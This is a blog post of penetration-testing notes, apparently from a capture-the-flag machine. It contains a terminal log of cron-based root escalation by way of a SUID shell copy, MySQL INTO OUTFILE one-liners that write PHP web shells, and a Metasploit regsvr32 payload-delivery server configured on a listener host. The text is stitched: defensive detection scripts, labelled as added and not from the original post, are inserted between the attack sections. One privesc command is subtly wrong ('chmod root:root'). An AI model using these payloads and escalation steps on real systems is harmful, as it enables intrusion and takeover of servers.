Tuesday, May 25, 2021

Crontab privilege escalation

www-data@red:/etc$ ls -la cron*
-rw-r--r-- 1 root root  722 Apr  5  2016 crontab

cron.d:
total 32
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Jun  3  2016 .placeholder
-rw-r--r--   1 root root    56 Jun  3  2016 logrotate
-rw-r--r--   1 root root   589 Jul 16  2014 mdadm
-rw-r--r--   1 root root   670 Mar  1  2016 php

cron.daily:
total 56
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder
-rwxr-xr-x   1 root root   539 Apr  5  2016 apache2
-rwxr-xr-x   1 root root   376 Mar 31  2016 apport
-rwxr-xr-x   1 root root   920 Apr  5  2016 apt-compat
-rwxr-xr-x   1 root root  1597 Nov 26  2015 dpkg
-rwxr-xr-x   1 root root   372 May  6  2015 logrotate
-rwxr-xr-x   1 root root   539 Jul 16  2014 mdadm
-rwxr-xr-x   1 root root   249 Nov 12  2015 passwd
-rwxr-xr-x   1 root root   383 Mar  8  2016 samba
-rwxr-xr-x   1 root root   214 Apr 12  2016 update-notifier-common

cron.hourly:
total 20
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder

cron.monthly:
total 20
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder

cron.weekly:
total 28
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder
-rwxr-xr-x   1 root root    86 Apr 13  2016 fstrim
-rwxr-xr-x   1 root root   211 Apr 12  2016 update-notifier-common
www-data@red:/etc$ cd cron.d
www-data@red:/etc/cron.d$ ls
logrotate  mdadm  php
www-data@red:/etc/cron.d$ ls -la
total 32
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Jun  3  2016 .placeholder
-rw-r--r--   1 root root    56 Jun  3  2016 logrotate
-rw-r--r--   1 root root   589 Jul 16  2014 mdadm
-rw-r--r--   1 root root   670 Mar  1  2016 php
www-data@red:/etc/cron.d$ cd logrotate
bash: cd: logrotate: Not a directory
www-data@red:/etc/cron.d$ cat logrotate
*/5 *   * * *   root  /usr/local/sbin/cron-logrotate.sh
www-data@red:/etc/cron.d$ cat /usr/local/sbin/cron-logrotate.sh
#Simon, you really need to-do something about this
www-data@red:/etc/cron.d$ cd ..
www-data@red:/etc$ echo "cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit;chmod root:root /tmp/exploit">> /usr/local/sbin/cron-logrotate.sh
www-data@red:/etc$ cat /usr/local/sbin/cron-logrotate.sh
#Simon, you really need to-do something about this
cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit;chmod root:root /tmp/exploit
www-data@red:/etc$ cd
bash: cd: HOME not set
www-data@red:/etc$ cd ..
www-data@red:/$ /tmp/exploit -p
# cd /root
# ls
fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql

MySQL privilege escalation

For Windows:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\backdoor.php";

For Linux:

SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE "/var/www/https/blogblog/wp-content/uploads/shell.php";
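Two cheap checks for the file-write technique above, added here as an example rather than taken from the original post: a file written by INTO OUTFILE is created by the mysqld process, so it is owned by the database service account (usually "mysql") instead of the web server user, and a WordPress wp-content/uploads directory should never contain PHP at all. The database account name and web root are arguments; the hardening lines in the comments use a placeholder application user.

```shell
#!/bin/sh
# Detection for web shells dropped with SELECT ... INTO OUTFILE.
# 1. mysqld creates the file, so its owner is the database service account,
#    not the web server user that normally writes to wp-content/uploads.
# 2. wp-content/uploads holds media; a .php file there is always suspect.

# PHP files under web root $1 owned by database account $2 (e.g. /var/www mysql).
find_db_written_php() {
    find "$1" -type f -name '*.php' -user "$2"
}

# PHP files inside any WordPress uploads directory under web root $1.
find_php_in_uploads() {
    find "$1" -type f -name '*.php' -path '*/wp-content/uploads/*'
}

# Line counts of the above, convenient for cron jobs or monitoring checks.
count_db_written_php() { find_db_written_php "$@" | awk 'END { print NR }'; }
count_php_in_uploads()  { find_php_in_uploads "$@"  | awk 'END { print NR }'; }

# The fix belongs on the database side (my.cnf and SQL, shown as comments):
#   [mysqld]
#   secure_file_priv = /var/lib/mysql-files   # restrict INTO OUTFILE / LOAD DATA to one directory,
#                                             # or NULL to disable file import/export entirely
#   REVOKE FILE ON *.* FROM 'wpuser'@'localhost';   # 'wpuser' is a placeholder; web apps do not need FILE
```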



msf6 > search regsvr32

Matching Modules
================

   #  Name                                               Disclosure Date  Rank    Check  Description
   -  ----                                               ---------------  ----    -----  -----------
   0  auxiliary/server/regsvr32_command_delivery_server                   normal  No     Regsvr32.exe (.sct) Command Delivery Server
   1  exploit/multi/script/web_delivery                  2013-07-19       manual  No     Script Web Delivery


Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/script/web_delivery

msf6 > use 0
msf6 auxiliary(server/regsvr32_command_delivery_server) > show options

Module options (auxiliary/server/regsvr32_command_delivery_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CMD                       no        The command to execute
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

msf6 auxiliary(server/regsvr32_command_delivery_server) > set SRVHOST 192.168.1.5
SRVHOST => 192.168.1.5
msf6 auxiliary(server/regsvr32_command_delivery_server) > set SRVPORT 4444
SRVPORT => 4444
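The module above serves a .sct scriptlet that a target fetches with regsvr32.exe, so on the endpoint the indicator is a regsvr32 process-creation event whose command line points at a URL (/i:http...) or loads scrobj.dll. The following detection function is an added example, not part of the original post; the sample log lines are constructed in a loose Sysmon-style "Image: ... CommandLine: ..." layout and reuse the 192.168.1.5:4444 listener set above.

```shell
#!/bin/sh
# Flag process-creation log lines where regsvr32 is pointed at a remote
# scriptlet. Reads the files given as arguments, or stdin when none.
flag_regsvr32_remote_scriptlets() {
    awk '{
        l = tolower($0)
        if (l !~ /regsvr32/) next                 # only regsvr32 launches are interesting
        if (l ~ /scrobj\.dll/ || l ~ /\/i:https?:/ || l ~ /-i:https?:/) print $0
    }' "$@"
}

# Number of flagged lines, for alert thresholds.
count_regsvr32_hits() {
    flag_regsvr32_remote_scriptlets "$@" | awk 'END { print NR }'
}

# Constructed sample log, not real telemetry: one legitimate local DLL
# registration, one fetch of a scriptlet from the listener above, one
# unrelated process. The .sct path is a placeholder; the module picks a random URI.
sample_process_log() {
    cat <<'EOF'
2021-05-25 11:40:02 Image: C:\Windows\System32\regsvr32.exe CommandLine: regsvr32.exe /s C:\Program Files\Vendor\plugin.dll
2021-05-25 11:40:09 Image: C:\Windows\System32\regsvr32.exe CommandLine: regsvr32.exe /i:http://192.168.1.5:4444/PLACEHOLDER.sct scrobj.dll
2021-05-25 11:41:15 Image: C:\Windows\System32\notepad.exe CommandLine: notepad.exe report.txt
EOF
}
```

Only the second sample line is flagged; a regsvr32 run that registers a local DLL without scrobj.dll or a URL passes through untouched.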

Installation of WPScan

1) To install Ruby, type: sudo apt install ruby

2) To install the dependencies for building extensions, type: sudo apt install build-essential libcurl4-openssl-dev libxml2 libxml2-dev libxslt1-dev ruby-dev libgmp-dev zlib1g-dev

3) To install WPScan, type: sudo gem install wpscan